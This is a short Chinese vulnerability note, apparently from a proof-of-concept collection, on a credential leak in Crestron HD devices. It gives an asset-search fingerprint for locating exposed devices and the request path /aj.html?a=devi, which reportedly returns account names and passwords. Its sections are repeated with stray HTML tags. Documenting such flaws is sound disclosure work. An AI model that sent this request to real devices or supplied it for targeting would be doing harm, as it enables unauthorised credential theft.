CrestronHD aj.html存在账号密码泄漏漏洞
一、漏洞描述
Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息
二、影响版本
<font style="color:#000000;">Crestron HD</font>
三、资产测绘
app="Crestron-HD-RX-201-C-E"
四、漏洞复现
/aj.html?a=devi
Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息
<font style="color:#000000;">Crestron HD</font>
app="Crestron-HD-RX-201-C-E"
/aj.html?a=devi